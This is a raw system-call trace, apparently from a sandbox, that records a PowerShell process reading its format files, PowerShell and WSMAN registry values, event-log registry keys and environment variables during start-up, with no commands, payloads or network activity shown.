Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 True 17
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 True 62
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type True 2
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 True 21 [data captured]
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 True 1 [data captured]
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 True 1
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type True 2
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 True 4 [data captured]
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 True 1 [data captured]
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 True 1
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type True 2
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 True 4 [data captured]
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 True 1 [data captured]
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 True 1
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Environment Get Environment String name = MshEnableTrace False 3
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Environment Get Environment String name = MshEnableTrace False 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Environment Get Environment String name = MshEnableTrace False 1
Environment Get Environment String name = MshEnableTrace False 1
Environment Get Environment String name = MshEnableTrace False 1
Environment Get Environment String name = HOMEDRIVE, result_out = C: True 1
Environment Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 1
File Get Info filename = C:\, type = file_attributes True 4
Environment Get Environment String name = MshEnableTrace False 1
Environment Get Environment String name = MshEnableTrace False 2
Environment Get Environment String name = MshEnableTrace False 5
